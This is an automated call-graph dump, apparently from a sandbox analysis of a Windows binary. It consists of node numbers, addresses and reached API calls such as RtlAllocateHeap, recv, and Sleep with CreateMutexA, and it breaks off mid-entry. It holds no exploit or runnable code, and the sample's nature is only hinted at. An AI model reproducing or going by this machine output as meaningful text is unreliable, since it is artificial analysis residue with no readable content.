RtlAllocateHeap 10407->10409 10408->10405 10410 c07dac 10409->10410 10411 c06c5a __cftof RtlAllocateHeap 10410->10411 10411->10408 10413 c07b62 10412->10413 10414 c07b67 10412->10414 10415 c075f6 __dosmaperr RtlAllocateHeap 10413->10415 10420 c08ab6 10414->10420 10415->10414 10418 c075f6 __dosmaperr RtlAllocateHeap 10419 c07b99 10418->10419 10419->10318 10421 c08ad1 10420->10421 10424 c08868 10421->10424 10425 c0868d RtlAllocateHeap 10424->10425 10428 c0887a 10425->10428 10426 c088b3 10427 c0690a __cftof 4 API calls 10426->10427 10434 c088bf 10427->10434 10428->10426 10429 c0888f 10428->10429 10441 c07b85 10428->10441 10430 c075f6 __dosmaperr RtlAllocateHeap 10429->10430 10431 c08894 10430->10431 10433 c06c5a __cftof RtlAllocateHeap 10431->10433 10432 c06d52 4 API calls 10432->10434 10433->10441 10434->10432 10435 c088ee 10434->10435 10438 c08958 10435->10438 10442 c08a8d 10435->10442 10436 c08a8d RtlAllocateHeap 10439 c08a20 10436->10439 10438->10436 10440 c075f6 __dosmaperr RtlAllocateHeap 10439->10440 10439->10441 10440->10441 10441->10418 10441->10419 10443 c08ab2 10442->10443 10444 c08a9e 10442->10444 10443->10438 10444->10443 10445 c075f6 __dosmaperr RtlAllocateHeap 10444->10445 10446 c08aa7 10445->10446 10447 c06c5a __cftof RtlAllocateHeap 10446->10447 10447->10443 10450 c083ab 10448->10450 10449 c083dd 10449->10364 10450->10449 10484 c0c88e 10450->10484 10453 c085f1 10452->10453 10454 c08420 RtlAllocateHeap 10453->10454 10455 c08603 10454->10455 10455->10364 10457 c08586 10456->10457 10458 c075f6 __dosmaperr RtlAllocateHeap 10457->10458 10461 c0859a 10457->10461 10459 c0858f 10458->10459 10460 c06c5a __cftof RtlAllocateHeap 10459->10460 10460->10461 10461->10364 10463 c08433 10462->10463 10464 c0844e 10463->10464 10466 c08465 10463->10466 10465 c075f6 __dosmaperr RtlAllocateHeap 10464->10465 10467 c08453 10465->10467 10470 c0845e 10466->10470 10512 c0779f 10466->10512 10469 c06c5a __cftof RtlAllocateHeap 10467->10469 10469->10470 10470->10364 10472 c0825a 10471->10472 10473 c0779f RtlAllocateHeap 10472->10473 10474 c08297 10473->10474 10525 c0d3c8 10474->10525 10476 c0830d 10476->10364 10478 c08420 RtlAllocateHeap 10477->10478 10479 c0861b 10478->10479 10479->10364 10481 c0875d std::invalid_argument::invalid_argument 10480->10481 10483 c08707 10480->10483 10481->10372 10482 c0c88e __cftof 4 API calls 10482->10483 10483->10481 10483->10482 10487 c0c733 10484->10487 10488 c0c743 10487->10488 10489 c0c781 10488->10489 10490 c0c76d 10488->10490 10500 c0c748 10488->10500 10491 c0690a __cftof 4 API calls 10489->10491 10492 c075f6 __dosmaperr RtlAllocateHeap 10490->10492 10493 c0c78c 10491->10493 10494 c0c772 10492->10494 10495 c0c79c 10493->10495 10499 c0c7c8 __cftof 10493->10499 10496 c06c5a __cftof RtlAllocateHeap 10494->10496 10508 c12b7d 10495->10508 10496->10500 10502 c0c7de __cftof 10499->10502 10507 c0c815 __cftof 10499->10507 10500->10449 10501 c075f6 __dosmaperr RtlAllocateHeap 10501->10500 10502->10500 10502->10501 10503 c075f6 __dosmaperr RtlAllocateHeap 10503->10500 10504 c075f6 __dosmaperr RtlAllocateHeap 10505 c0c87f 10504->10505 10506 c06c5a __cftof RtlAllocateHeap 10505->10506 10506->10500 10507->10500 10507->10504 10509 c12b98 10508->10509 10510 c0c7b1 10508->10510 10509->10510 10511 c12c28 __cftof RtlAllocateHeap 10509->10511 10510->10500 10510->10503 10511->10510 10513 c077b4 10512->10513 10515 c077c3 10512->10515 10514 c075f6 __dosmaperr RtlAllocateHeap 10513->10514 10516 c077b9 10514->10516 10515->10516 10517 c0b04b __cftof RtlAllocateHeap 10515->10517 10516->10470 10518 c077ea 10517->10518 10519 c07801 10518->10519 10522 c07a33 10518->10522 10520 c0adf5 ___free_lconv_mon RtlAllocateHeap 10519->10520 10520->10516 10523 c0adf5 ___free_lconv_mon RtlAllocateHeap 10522->10523 10524 c07a42 10523->10524 10524->10519 10526 c0d3d8 10525->10526 10527 c0d3ee 10525->10527 10528 c075f6 __dosmaperr RtlAllocateHeap 10526->10528 10527->10526 10531 c0d400 10527->10531 10529 c0d3dd 10528->10529 10530 c06c5a __cftof RtlAllocateHeap 10529->10530 10544 c0d3e7 10530->10544 10533 c0d467 10531->10533 10534 c0d439 10531->10534 10532 c0d485 10536 c0d4e4 10532->10536 10537 c0d4ae 10532->10537 10533->10532 10535 c0d48a 10533->10535 10546 c0d2ff 10534->10546 10551 c0cbdf 10535->10551 10579 c0cef8 10536->10579 10539 c0d4b3 10537->10539 10540 c0d4cc 10537->10540 10562 c0d23e 10539->10562 10572 c0d0e2 10540->10572 10544->10476 10547 c0d315 10546->10547 10548 c0d320 10546->10548 10547->10544 10549 c0a1f1 ___std_exception_copy RtlAllocateHeap 10548->10549 10550 c0d37b __cftof 10549->10550 10550->10544 10552 c0cbf1 10551->10552 10553 c0690a __cftof 4 API calls 10552->10553 10554 c0cc05 10553->10554 10555 c0cc21 10554->10555 10556 c0cc0d 10554->10556 10558 c0cef8 4 API calls 10555->10558 10561 c0cc1c __alldvrm __cftof _strrchr 10555->10561 10557 c075f6 __dosmaperr RtlAllocateHeap 10556->10557 10559 c0cc12 10557->10559 10558->10561 10560 c06c5a __cftof RtlAllocateHeap 10559->10560 10560->10561 10561->10544 10587 c131a8 10562->10587 10564 c0d26c 10621 c12c47 10564->10621 10566 c0d29e 10567 c0d2de 10566->10567 10568 c0d2b7 10566->10568 10571 c0d2a5 10566->10571 10633 c0cf9a 10567->10633 10630 c0d16d 10568->10630 10571->10544 10573 c131a8 RtlAllocateHeap 10572->10573 10574 c0d10f 10573->10574 10575 c12c47 RtlAllocateHeap 10574->10575 10576 c0d147 10575->10576 10577 c0d14e 10576->10577 10578 c0d16d 4 API calls 10576->10578 10577->10544 10578->10577 10580 c0cf10 10579->10580 10581 c131a8 RtlAllocateHeap 10580->10581 10582 c0cf29 10581->10582 10583 c12c47 RtlAllocateHeap 10582->10583 10584 c0cf6e 10583->10584 10585 c0cf75 10584->10585 10586 c0cf9a 4 API calls 10584->10586 10585->10544 10586->10585 10590 c131db 10587->10590 10588 c0a1f1 ___std_exception_copy RtlAllocateHeap 10591 c1448b __cftof std::invalid_argument::invalid_argument 10588->10591 10589 c13250 10589->10588 10590->10589 10592 c132a7 10590->10592 10591->10564 10593 c16560 RtlAllocateHeap 10592->10593 10594 c1331e 10593->10594 10595 c16670 __floor_pentium4 RtlAllocateHeap 10594->10595 10596 c13328 10595->10596 10597 c135a2 10596->10597 10599 c133cc 10596->10599 10601 c1362c __cftof 10596->10601 10598 c0bac8 __cftof RtlAllocateHeap 10597->10598 10597->10601 10598->10601 10600 c0bac8 __cftof RtlAllocateHeap 10599->10600 10605 c13456 10599->10605 10600->10605 10602 c0bac8 __cftof RtlAllocateHeap 10601->10602 10604 c1359a 10602->10604 10603 c0bac8 __cftof RtlAllocateHeap 10603->10604 10619 c13998 __cftof 10604->10619 10620 c13dec __cftof 10604->10620 10605->10603 10606 c1427d 10607 c12d10 RtlAllocateHeap 10606->10607 10613 c142c9 10607->10613 10608 c13d0c 10609 c0bac8 __cftof RtlAllocateHeap 10608->10609 10610 c13dda 10608->10610 10609->10610 10610->10606 10611 c0bac8 __cftof RtlAllocateHeap 10610->10611 10611->10606 10612 c0bac8 RtlAllocateHeap __cftof 10612->10619 10614 c0bac8 __cftof RtlAllocateHeap 10613->10614 10618 c14333 10613->10618 10614->10618 10615 c0bac8 RtlAllocateHeap __cftof 10615->10620 10616 c12d10 RtlAllocateHeap 10616->10618 10617 c0bac8 __cftof RtlAllocateHeap 10617->10618 10618->10591 10618->10616 10618->10617 10619->10608 10619->10612 10620->10608 10620->10615 10622 c12c54 10621->10622 10623 c12c6a 10621->10623 10624 c075f6 __dosmaperr RtlAllocateHeap 10622->10624 10629 c12c63 10622->10629 10623->10622 10625 c12c86 10623->10625 10628 c12c59 10624->10628 10627 c075f6 __dosmaperr RtlAllocateHeap 10625->10627 10626 c06c5a __cftof RtlAllocateHeap 10626->10629 10627->10628 10628->10626 10629->10566 10631 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10630->10631 10632 c0d183 __cftof 10631->10632 10632->10571 10634 c0cfab 10633->10634 10635 c0cfb9 10634->10635 10636 c0cfce 10634->10636 10637 c075f6 __dosmaperr RtlAllocateHeap 10635->10637 10638 c0690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10636->10638 10639 c0cfbe 10637->10639 10642 c0cfda 10638->10642 10640 c06c5a __cftof RtlAllocateHeap 10639->10640 10641 c0cfc8 10640->10641 10641->10571 10643 c0a1f1 ___std_exception_copy RtlAllocateHeap 10642->10643 10644 c0d057 __cftof 10643->10644 10645 bd18a0 10646 be80c0 RtlAllocateHeap 10645->10646 10647 bd18b1 10646->10647 10650 bed64e 10647->10650 10653 bed621 10650->10653 10654 bed637 10653->10654 10655 bed630 10653->10655 10662 c098fa 10654->10662 10659 c0988e 10655->10659 10658 bd18bb 10660 c098fa RtlAllocateHeap 10659->10660 10661 c098a0 10660->10661 10661->10658 10665 c09630 10662->10665 10664 c0992b 10664->10658 10666 c0963c __dosmaperr 10665->10666 10669 c0968b 10666->10669 10668 c09657 10668->10664 10670 c096a7 10669->10670 10678 c0971e __dosmaperr 10669->10678 10677 c096fe 10670->10677 10670->10678 10679 c0edf6 10670->10679 10671 c0edf6 RtlAllocateHeap 10673 c09714 10671->10673 10675 c0adf5 ___free_lconv_mon RtlAllocateHeap 10673->10675 10674 c096f4 10676 c0adf5 ___free_lconv_mon RtlAllocateHeap 10674->10676 10675->10678 10676->10677 10677->10671 10677->10678 10678->10668 10680 c0ee03 10679->10680 10681 c0ee1e 10679->10681 10680->10681 10682 c0ee0f 10680->10682 10683 c0ee2d 10681->10683 10688 c14fdc 10681->10688 10684 c075f6 __dosmaperr RtlAllocateHeap 10682->10684 10695 c1500f 10683->10695 10687 c0ee14 __cftof 10684->10687 10687->10674 10689 c14fe7 10688->10689 10690 c14ffc 10688->10690 10691 c075f6 __dosmaperr RtlAllocateHeap 10689->10691 10690->10683 10692 c14fec 10691->10692 10693 c06c5a __cftof RtlAllocateHeap 10692->10693 10694 c14ff7 10693->10694 10694->10683 10696 c15027 10695->10696 10697 c1501c 10695->10697 10699 c1502f 10696->10699 10703 c15038 __dosmaperr 10696->10703 10698 c0b04b __cftof RtlAllocateHeap 10697->10698 10700 c15024 10698->10700 10701 c0adf5 ___free_lconv_mon RtlAllocateHeap 10699->10701 10700->10687 10701->10700 10702 c075f6 __dosmaperr RtlAllocateHeap 10702->10700 10703->10700 10703->10702 10704 bd20a0 10709 bec68b 10704->10709 10707 bed64e RtlAllocateHeap 10708 bd20b6 10707->10708 10712 bec3d5 10709->10712 10711 bd20ac 10711->10707 10713 bec3eb 10712->10713 10714 bec3e1 10712->10714 10713->10711 10715 bec3be 10714->10715 10716 bec39e 10714->10716 10725 becd0a 10715->10725 10716->10713 10721 beccd5 10716->10721 10718 bec3d0 10718->10711 10722 becce3 InitializeCriticalSectionEx 10721->10722 10724 bec3b7 10721->10724 10722->10724 10724->10711 10726 becd1f RtlInitializeConditionVariable 10725->10726 10726->10718 10742 bd34a0 10743 bd34aa 10742->10743 10744 bd34ca shared_ptr 10742->10744 10743->10744 10745 c06c6a RtlAllocateHeap 10743->10745 10746 bd34f2 Concurrency::cancel_current_task shared_ptr 10745->10746 11860 bd5a9e 11863 bd5a61 11860->11863 11861 be80c0 RtlAllocateHeap 11861->11863 11863->11860 11863->11861 11864 be7a00 RtlAllocateHeap 11863->11864 11865 bd5bdd std::invalid_argument::invalid_argument 11863->11865 11866 bd5730 11863->11866 11864->11863 11870 bd5860 shared_ptr 11866->11870 11874 bd5799 shared_ptr 11866->11874 11867 bd592a 11869 be8200 RtlAllocateHeap 11867->11869 11868 be80c0 RtlAllocateHeap 11868->11874 11869->11870 11871 bd5900 shared_ptr std::invalid_argument::invalid_argument 11870->11871 11872 c06c6a RtlAllocateHeap 11870->11872 11871->11863 11873 bd5934 11872->11873 11874->11867 11874->11868 11874->11870 10754 c144f2 10755 c1450c 10754->10755 10756 c144ff 10754->10756 10759 c14518 10755->10759 10760 c075f6 __dosmaperr RtlAllocateHeap 10755->10760 10757 c075f6 __dosmaperr RtlAllocateHeap 10756->10757 10758 c14504 10757->10758 10761 c14539 10760->10761 10762 c06c5a __cftof RtlAllocateHeap 10761->10762 10762->10758 10763 bd3c8e 10764 bd3c98 10763->10764 10765 bd3cb4 10764->10765 10773 bd2410 10764->10773 10769 bd3ccf 10765->10769 10788 bd3810 10765->10788 10771 bd3810 4 API calls 10769->10771 10772 bd3cdb 10771->10772 10774 bd2424 10773->10774 10792 beb52d 10774->10792 10777 bd3ce0 10778 bd3d42 10777->10778 10780 bd3d52 10777->10780 10847 be7d50 10778->10847 10781 bed3e2 RtlAllocateHeap 10780->10781 10782 bd3d84 10781->10782 10783 be7d50 RtlAllocateHeap 10782->10783 10785 bd3e03 10782->10785 10783->10785 10784 bd3e9b shared_ptr 10784->10765 10785->10784 10786 c06c6a RtlAllocateHeap 10785->10786 10787 bd3ec1 10786->10787 10789 bd381c 10788->10789 10879 bd2440 10789->10879 10800 c03aed 10792->10800 10794 bd242a 10794->10777 10795 beb5a5 ___std_exception_copy 10807 beb1ad 10795->10807 10796 beb598 10803 beaf56 10796->10803 10811 c04f29 10800->10811 10802 beb555 10802->10794 10802->10795 10802->10796 10804 beaf9f ___std_exception_copy 10803->10804 10806 beafb2 shared_ptr 10804->10806 10823 beb39f 10804->10823 10806->10794 10808 beb1d8 10807->10808 10809 beb1e1 shared_ptr 10807->10809 10810 beb39f 5 API calls 10808->10810 10809->10794 10810->10809 10818 c04f37 10811->10818 10813 c04f2e __cftof 10813->10802 10814 c0d634 __cftof 4 API calls 10813->10814 10816 c08bfc __cftof 10813->10816 10814->10816 10815 c065ed __cftof 3 API calls 10817 c08c2f 10815->10817 10816->10815 10819 c04f40 10818->10819 10820 c04f43 10818->10820 10819->10813 10821 c04f77 10820->10821 10822 c08ba3 ___std_exception_copy RtlAllocateHeap 10820->10822 10821->10813 10822->10821 10834 bebedf 10823->10834 10826 beb3e8 10826->10806 10843 becc31 10834->10843 10837 c06cbb 10838 c06cc7 __dosmaperr 10837->10838 10839 c0a671 __cftof 4 API calls 10838->10839 10842 c06ccc 10839->10842 10840 c08bec __cftof 4 API calls 10841 c06cf6 10840->10841 10842->10840 10844 becc3f InitOnceExecuteOnce 10843->10844 10846 beb3e1 10843->10846 10844->10846 10846->10826 10846->10837 10848 be7dcb 10847->10848 10849 be7d62 10847->10849 10850 bd2480 RtlAllocateHeap 10848->10850 10851 be7d9c 10849->10851 10852 be7d6d 10849->10852 10853 be7d7a 10850->10853 10855 be7db9 10851->10855 10858 bed3e2 RtlAllocateHeap 10851->10858 10852->10848 10854 be7d74 10852->10854 10856 c06c6a RtlAllocateHeap 10853->10856 10860 be7d83 10853->10860 10857 bed3e2 RtlAllocateHeap 10854->10857 10855->10780 10865 be7dd5 10856->10865 10857->10853 10859 be7da6 10858->10859 10859->10780 10860->10780 10861 be7f20 10862 be9270 RtlAllocateHeap 10861->10862 10875 be7e91 __cftof 10862->10875 10863 be7e01 10863->10780 10864 be7f1b 10869 bd2480 RtlAllocateHeap 10864->10869 10865->10861 10865->10863 10865->10864 10867 be7ea7 10865->10867 10868 be7e80 10865->10868 10866 c06c6a RtlAllocateHeap 10874 be7f2a __cftof 10866->10874 10872 bed3e2 RtlAllocateHeap 10867->10872 10867->10875 10868->10864 10870 be7e8b 10868->10870 10869->10861 10871 bed3e2 RtlAllocateHeap 10870->10871 10871->10875 10872->10875 10873 be7f61 shared_ptr 10873->10780 10874->10873 10876 c06c6a RtlAllocateHeap 10874->10876 10875->10866 10877 be7f02 shared_ptr 10875->10877 10878 be7f7c 10876->10878 10877->10780 10882 beb5d6 10879->10882 10881 bd2472 10883 beb5f1 Concurrency::cancel_current_task 10882->10883 10884 c08bec __cftof 4 API calls 10883->10884 10886 beb658 __cftof std::invalid_argument::invalid_argument 10883->10886 10885 beb69f 10884->10885 10886->10881 11895 be8680 11896 be86e0 11895->11896 11896->11896 11904 be7760 11896->11904 11898 be86f9 11899 be8f40 RtlAllocateHeap 11898->11899 11900 be8714 11898->11900 11899->11900 11900->11900 11901 be8f40 RtlAllocateHeap 11900->11901 11903 be8769 11900->11903 11902 be87b1 11901->11902 11905 be7864 shared_ptr __cftof 11904->11905 11906 be777b 11904->11906 11905->11898 11906->11905 11907 be78f1 11906->11907 11911 be77ea 11906->11911 11912 be7811 11906->11912 11917 be77fb __cftof 11906->11917 11908 be9270 RtlAllocateHeap 11907->11908 11909 be78f6 11908->11909 11910 bd2480 RtlAllocateHeap 11909->11910 11913 be78fb 11910->11913 11911->11909 11915 bed3e2 RtlAllocateHeap 11911->11915 11914 bed3e2 RtlAllocateHeap 11912->11914 11912->11917 11914->11917 11915->11917 11916 c06c6a RtlAllocateHeap 11916->11907 11917->11905 11917->11916 11918 bda682 11920 bda68a shared_ptr 11918->11920 11919 bda949 11921 bda94e 11919->11921 11922 c06c6a RtlAllocateHeap 11919->11922 11920->11919 11923 bda75d shared_ptr 11920->11923 11924 bda953 Sleep CreateMutexA 11921->11924 11925 c06c6a RtlAllocateHeap 11921->11925 11922->11921 11926 be80c0 RtlAllocateHeap 11923->11926 11928 bda98e 11924->11928 11925->11924 11927 bda903 11926->11927 11933 bd6ae9 11936 bd6b01 11933->11936 11934 be80c0 RtlAllocateHeap 11935 bd6bac 11934->11935 11937 be9280 RtlAllocateHeap 11935->11937 11936->11934 11938 bd6bbd shared_ptr 11936->11938 11937->11938 11939 be80c0 RtlAllocateHeap 11938->11939 11940 bd6ce3 shared_ptr std::invalid_argument::invalid_argument 11939->11940 11961 bd9adc 11965 bd9aea shared_ptr 11961->11965 11962 bda917 11963 bda953 Sleep CreateMutexA 11962->11963 11964 c06c6a RtlAllocateHeap 11962->11964 11967 bda98e 11963->11967 11964->11963 11965->11962 11966 bd9b4b shared_ptr 11965->11966 11968 bd9b59 11966->11968 11969 bd9b65 11966->11969 11972 be80c0 RtlAllocateHeap 11968->11972 11970 be7a00 RtlAllocateHeap 11969->11970 11971 bd9b74 11970->11971 11973 bd5c10 4 API calls 11971->11973 11974 bda903 11972->11974 11975 bd9b7c 11973->11975 11976 bd8b30 4 API calls 11975->11976 11977 bd9b8d 11976->11977 11978 be8220 RtlAllocateHeap 11977->11978 11979 bd9b9c 11978->11979 11980 be7a00 RtlAllocateHeap 11979->11980 11981 bd9ca9 11980->11981 11982 bd5c10 4 API calls 11981->11982 11983 bd9cb1 11982->11983 11984 bd8b30 4 API calls 11983->11984 11985 bd9cc2 11984->11985 11986 be8220 RtlAllocateHeap 11985->11986 11987 bd9cd1 11986->11987 10935 bed0c7 10936 bed0d6 10935->10936 10937 bed17f 10936->10937 10938 bed17b RtlWakeAllConditionVariable 10936->10938 10949 bd20c0 10950 bec68b __Mtx_init_in_situ 2 API calls 10949->10950 10951 bd20cc 10950->10951 10952 bed64e RtlAllocateHeap 10951->10952 10953 bd20d6 10952->10953 10959 bde0c0 recv 10960 bde122 recv 10959->10960 10961 bde157 recv 10960->10961 10963 bde191 10961->10963 10962 bde2b3 std::invalid_argument::invalid_argument 10963->10962 10968 bec6ac 10963->10968 10975 bec452 10968->10975 10970 bde2ee 10971 bec26a 10970->10971 10972 bec292 10971->10972 10973 bec274 10971->10973 10972->10972 10973->10972 10992 bec297 10973->10992 10976 bec47a std::invalid_argument::invalid_argument 10975->10976 10977 bec4a8 10975->10977 10976->10970 10977->10976 10981 becf6b 10977->10981 10979 bec4fd __Xtime_diff_to_millis2 10979->10976 10980 becf6b _xtime_get GetSystemTimePreciseAsFileTime 10979->10980 10980->10979 10982 becf7a 10981->10982 10984 becf87 __aulldvrm 10981->10984 10982->10984 10985 becf44 10982->10985 10984->10979 10988 becbea 10985->10988 10989 becbfb GetSystemTimePreciseAsFileTime 10988->10989 10990 becc07 10988->10990 10989->10990 10990->10984 10997 bd2ae0 10992->10997 10996 bec2bf Concurrency::cancel_current_task 10998 bebedf InitOnceExecuteOnce 10997->10998 11000 bd2af4 __dosmaperr 10998->11000 10999 bd2aff 11005 bec1ff 10999->11005 11000->10999 11001 c0a671 __cftof 4 API calls 11000->11001 11002 c06ccc 11001->11002 11003 c08bec __cftof 4 API calls 11002->11003 11004 c06cf6 11003->11004 11006 bec20b __EH_prolog3_GS 11005->11006 11007 be80c0 RtlAllocateHeap 11006->11007 11008 bec23d 11007->11008 11013 bd26b0 11008->11013 11010 bec252 11030 be7970 11010->11030 11012 bec25a 11012->10996 11014 be7a00 RtlAllocateHeap 11013->11014 11015 bd2702 11014->11015 11016 bd2725 11015->11016 11035 be8f40 11015->11035 11018 be8f40 RtlAllocateHeap 11016->11018 11019 bd278e 11016->11019 11018->11019 11020 bd27ed shared_ptr 11019->11020 11022 bd28b8 11019->11022 11021 c038af ___std_exception_copy RtlAllocateHeap 11020->11021 11025 bd284b 11021->11025 11023 c06c6a RtlAllocateHeap 11022->11023 11023->11025 11024 bd287a shared_ptr std::invalid_argument::invalid_argument 11024->11010 11025->11024 11026 c06c6a RtlAllocateHeap 11025->11026 11027 bd28c2 11026->11027 11056 c03912 11027->11056 11029 bd28e5 shared_ptr 11029->11010 11031 be797b 11030->11031 11032 be7996 shared_ptr 11030->11032 11031->11032 11033 c06c6a RtlAllocateHeap 11031->11033 11032->11012 11034 be79ba 11033->11034 11036 be908e 11035->11036 11037 be8f6b 11035->11037 11038 be9270 RtlAllocateHeap 11036->11038 11041 be8fb2 11037->11041 11042 be8fdc 11037->11042 11039 be9093 11038->11039 11040 bd2480 RtlAllocateHeap 11039->11040 11048 be8fc3 __cftof 11040->11048 11041->11039 11043 be8fbd 11041->11043 11044 bed3e2 RtlAllocateHeap 11042->11044 11042->11048 11046 bed3e2 RtlAllocateHeap 11043->11046 11044->11048 11045 c06c6a RtlAllocateHeap 11047 be909d 11045->11047 11046->11048 11049 be90b8 11047->11049 11051 bd2480 Concurrency::cancel_current_task 11047->11051 11052 be90be 11047->11052 11048->11045 11053 be904c shared_ptr __cftof 11048->11053 11050 bed3e2 RtlAllocateHeap 11049->11050 11050->11052 11054 c038af ___std_exception_copy RtlAllocateHeap 11051->11054 11052->11016 11053->11016 11055 bd24c3 11054->11055 11055->11016 11057 c03926 11056->11057 11058 c0391f 11056->11058 11057->11029 11059 c08ba3 ___std_exception_copy RtlAllocateHeap 11058->11059 11059->11057 11993 bd2ec0 11994 bd2f6f 11993->11994 11995 bd2f06 11993->11995 11998 bd2fef 11994->11998 12006 bec6ac GetSystemTimePreciseAsFileTime 11994->12006 11996 bec6ac GetSystemTimePreciseAsFileTime 11995->11996 11997 bd2f12 11996->11997 11999 bd2f1d 11997->11999 12000 bd301e 11997->12000 12003 bed3e2 RtlAllocateHeap 11999->12003 12005 bd2f30 __Mtx_unlock 11999->12005 12001 bec26a 5 API calls 12000->12001 12002 bd3024 12001->12002 12004 bec26a 5 API calls 12002->12004 12003->12005 12007 bd2fb9 12004->12007 12005->11994 12005->12002 12006->12007 12008 bec26a 5 API calls 12007->12008 12009 bd2fc0 __Mtx_unlock 12007->12009 12008->12009 12010 bec26a 5 API calls 12009->12010 12011 bd2fd8 __Cnd_broadcast 12009->12011 12010->12011 12011->11998 12012 bec26a 5 API calls 12011->12012 12013 bd303c 12012->12013 12014 bec6ac GetSystemTimePreciseAsFileTime 12013->12014 12024 bd3080 shared_ptr __Mtx_unlock 12014->12024 12015 bd31c5 12016 bec26a 5 API calls 12015->12016 12017 bd31cb 12016->12017 12018 bec26a 5 API calls 12017->12018 12019 bd31d1 12018->12019 12020 bec26a 5 API calls 12019->12020 12026 bd3193 __Mtx_unlock 12020->12026 12021 bd31a7 std::invalid_argument::invalid_argument 12022 bec26a 5 API calls 12023 bd31dd 12022->12023 12024->12015 12024->12017 12024->12021 12025 bec6ac GetSystemTimePreciseAsFileTime 12024->12025 12027 bd315f 12025->12027 12026->12021 12026->12022 12027->12015 12027->12019 12027->12026 12028 bebd4c GetSystemTimePreciseAsFileTime 12027->12028 12028->12027 12044 c06a44 12045 c06a52 12044->12045 12046 c06a5c 12044->12046 12057 c0b655 12045->12057 12062 c0698d 12046->12062 12049 c06a59 12050 c06a76 12065 c068ed 12050->12065 12053 c0b655 RtlAllocateHeap 12054 c06a8a 12053->12054 12055 c06aa8 12054->12055 12056 c0adf5 ___free_lconv_mon RtlAllocateHeap 12054->12056 12056->12055 12058 c0b662 12057->12058 12059 c0b679 12058->12059 12068 c075c0 12058->12068 12059->12049 12063 c0690a __cftof 4 API calls 12062->12063 12064 c0699f 12063->12064 12064->12050 12076 c0683b 12065->12076 12073 c075e3 12068->12073 12070 c075cb __dosmaperr 12071 c075f6 __dosmaperr RtlAllocateHeap 12070->12071 12072 c075de 12071->12072 12072->12049 12074 c0a7c8 __dosmaperr RtlAllocateHeap 12073->12074 12075 c075e8 12074->12075 12075->12070 12077 c06863 12076->12077 12078 c06849 12076->12078 12080 c0686a 12077->12080 12082 c06889 __cftof 12077->12082 12089 c069cc 12078->12089 12086 c06853 12080->12086 12093 c069e6 12080->12093 12083 c069e6 RtlAllocateHeap 12082->12083 12085 c0689f __cftof 12082->12085 12083->12085 12084 c075c0 __dosmaperr RtlAllocateHeap 12087 c068ab 12084->12087 12085->12084 12085->12086 12086->12053 12086->12054 12088 c075f6 __dosmaperr RtlAllocateHeap 12087->12088 12088->12086 12090 c069df 12089->12090 12091 c069d7 12089->12091 12090->12086 12092 c0adf5 ___free_lconv_mon RtlAllocateHeap 12091->12092 12092->12090 12094 c069cc RtlAllocateHeap 12093->12094 12095 c069f4 12094->12095 12098 c06a25 12095->12098 12099 c0b04b __cftof RtlAllocateHeap 12098->12099 12100 c06a05 12099->12100 12100->12086 11073 bd1020 11074 be80c0 RtlAllocateHeap 11073->11074 11075 bd1031 11074->11075 11076 bed64e RtlAllocateHeap 11075->11076 11077 bd103b 11076->11077 11091 bda418 11092 bda420 shared_ptr 11091->11092 11093 bda93f 11092->11093 11094 bda4f3 shared_ptr 11092->11094 11095 c06c6a RtlAllocateHeap 11093->11095 11098 be80c0 RtlAllocateHeap 11094->11098 11096 bda944 11095->11096 11097 c06c6a RtlAllocateHeap 11096->11097 11099 bda949 11097->11099 11100 bda903 11098->11100 11101 bda94e 11099->11101 11102 c06c6a RtlAllocateHeap 11099->11102 11103 bda953 Sleep CreateMutexA 11101->11103 11104 c06c6a RtlAllocateHeap 11101->11104 11102->11101 11105 bda98e 11103->11105 11104->11103 11129 bd1000 11130 bed64e RtlAllocateHeap 11129->11130 11131 bd100a 11130->11131 12139 bd2e00 12140 bd2e28 12139->12140 12141 bec68b __Mtx_init_in_situ 2 API calls 12140->12141 12142 bd2e33 12141->12142 11132 bda079 11133 bda081 shared_ptr 11132->11133 11134 bda930 11133->11134 11135 bda154 shared_ptr 11133->11135 11136 c06c6a RtlAllocateHeap 11134->11136 11138 be80c0 RtlAllocateHeap 11135->11138 11137 bda953 Sleep CreateMutexA 11136->11137 11140 bda98e 11137->11140 11139 bda903 11138->11139 11141 bdcc79 11142 bdcc84 shared_ptr 11141->11142 11143 bdce09 shared_ptr std::invalid_argument::invalid_argument 11142->11143 11144 bdce31 11142->11144 11145 be7a00 RtlAllocateHeap 11142->11145 11149 bd5c10 4 API calls 11142->11149 11156 be8f40 RtlAllocateHeap 11142->11156 11157 bd9030 11142->11157 11170 be8220 11142->11170 11146 c06c6a RtlAllocateHeap 11144->11146 11145->11142 11147 bdce36 11146->11147 11148 be7a00 RtlAllocateHeap 11147->11148 11150 bdce92 11148->11150 11149->11142 11151 bd5c10 4 API calls 11150->11151 11153 bdce9d 11151->11153 11178 bdca70 11153->11178 11156->11142 11158 bd9080 11157->11158 11159 be7a00 RtlAllocateHeap 11158->11159 11160 bd908f 11159->11160 11161 bd5c10 4 API calls 11160->11161 11162 bd909a 11161->11162 11163 be80c0 RtlAllocateHeap 11162->11163 11164 bd90ec 11163->11164 11165 be8220 RtlAllocateHeap 11164->11165 11167 bd90fe shared_ptr 11165->11167 11166 bd917e shared_ptr std::invalid_argument::invalid_argument 11166->11142 11167->11166 11168 c06c6a RtlAllocateHeap 11167->11168 11169 bd91aa 11168->11169 11171 be8248 11170->11171 11172 be8292 11170->11172 11171->11172 11173 be8251 11171->11173 11176 be82a1 11172->11176 11177 be8f40 RtlAllocateHeap 11172->11177 11194 be9280 11173->11194 11175 be825a 11175->11142 11176->11142 11177->11176 11193 bdcadd 11178->11193 11179 be7a00 RtlAllocateHeap 11179->11193 11180 bdce09 shared_ptr std::invalid_argument::invalid_argument 11181 bdce31 11183 c06c6a RtlAllocateHeap 11181->11183 11182 bd5c10 4 API calls 11182->11193 11184 bdce36 11183->11184 11186 be7a00 RtlAllocateHeap 11184->11186 11185 bd9030 4 API calls 11185->11193 11188 bdce92 11186->11188 11187 be8220 RtlAllocateHeap 11187->11193 11189 bd5c10 4 API calls 11188->11189 11190 bdce9d 11189->11190 11191 bdca70 4 API calls 11190->11191 11192 be8f40 RtlAllocateHeap 11192->11193 11193->11179 11193->11180 11193->11181 11193->11182 11193->11185 11193->11187 11193->11192 11195 be9294 11194->11195 11198 be92a5 __cftof 11195->11198 11199 be94e0 11195->11199 11197 be932b 11197->11175 11198->11175 11200 be950b 11199->11200 11201 be9619 11199->11201 11205 be9579 11200->11205 11206 be9552 11200->11206 11202 be9270 RtlAllocateHeap 11201->11202 11203 be961e 11202->11203 11204 bd2480 RtlAllocateHeap 11203->11204 11212 